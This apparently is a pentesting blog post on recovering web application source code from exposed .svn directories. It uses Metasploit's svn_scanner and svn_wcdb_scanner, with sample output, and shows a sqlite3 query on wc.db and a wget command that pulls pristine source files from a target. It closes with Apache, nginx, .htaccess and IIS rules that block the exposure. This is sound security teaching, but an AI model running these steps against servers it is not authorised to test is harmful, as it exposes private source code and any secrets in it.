Check for .entries files
Walk svn chain to retrieve source
Example:
http://somedomain.com/.svn/text-base/index.php.svn-base
http://somedomain.com/.svn/entries
Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_scanner
msf auxiliary(svn_scanner) > run
[*] Using code '404' as not found.
[+] [1.2.3.52:80] SVN Entries file found.
[*] [1.2.3.52] dir CURRENT [dw394]
[*] - Trying to get file rss2html2.php source code.
[*] - Location: /.svn/text-base/rss2html2.php.svn-base
[*]
Fatal error: Call to undefined function FeedForAll_scripts_readFile() in /usr/local/apache2-marketing/htdocs/.svn/text-base/rss2html2.php.svn-base on line 772
---SNIP---
[*] Done. 175 records.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Unfortunately web servers will usually catch the php and try to render it for you :-(
Once you have the source you look for config files or interesting things in the source code
Example:
Subversion 1.7 and later
Working copy and changes stored in a sqlite database
Example:
http://www.somedomain.com/.svn/wc.db
Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_wcdb_scanner
From the SANS link below example to pull out files on the server
"We have the file name and the SHA1 used by Subversion. With a little SQL-Kung-Fu, we can create a mapping of files used by the application and the files as stored by Subversion."
$ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;'
index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base
style/style.js|.svn/pristine/2s/2cc5590e0ba024c3db77a13896da09b39ea74799.svn-base
...
Anything with a .svn/pristine should be downloadable:
$ wget -O - http://www.sometarget.tgt/.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
<?php
// This is the index.php file
...
Example:
Great reference for the above:
http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us
Other blog posts on the subject:
https://blog.netspi.com/parsing-svn-entries-files-with-powershell/
Fixes (quick Google searches, didnt test)
Apache
or
RedirectMatch permanent .*\.(svn|git|hg|bzr|cvs)/.* /
nginx
location ~ /.svn/ {
deny all;
}
.htaccess
RedirectMatch 404 (?i)\.svn
IIS
couple answers here, although none marked as "the answer"
http://serverfault.com/questions/23340/ignoring-svn-directories-under-iis
also http://www.petefreitag.com/item/823.cfm (Great site BTW)
No comments:
Post a Comment